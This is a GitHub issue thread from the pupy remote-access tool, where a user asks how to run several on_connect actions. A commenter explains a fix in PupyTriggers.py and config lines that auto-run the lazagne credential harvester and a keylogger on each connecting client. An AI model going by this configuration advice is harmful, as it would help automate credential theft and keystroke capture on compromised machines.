### ISSUE TITLE
Multiple "on_connect" process ?

### ISSUE THREAD

**Issue by theCake75** [n1nj4sec/pupy#402]
Hello, 

When I try to make put multiple on_connect process only the last one works, for exemple
If i put
run_module = lazagne
run_module = keylogger start
on my conf file only keylogger start will work, how can I run these 2 ?

**Comment by tomer70** [comment]
Hi,

The issue here is caused since In pupylib\PupyTriggers.py inside on_connect method the for loop is using `client.pupsrv.config.items("on_connect")` which seems to work with dictionary so when you write:
run_module = x twice, it ran over the first one.
Anyway, to fix this problem you can change this line: `if action=="run_module":` to `if action:`
And then you could write whatever you want before the ‘=’ just don’t repeat the same key, for example use:
run_module = lazagne
run_module2 = keylogger start
tmp_key = gather/users

I didn’t verify that it doesn’t broke anything else, but it works fine for me.
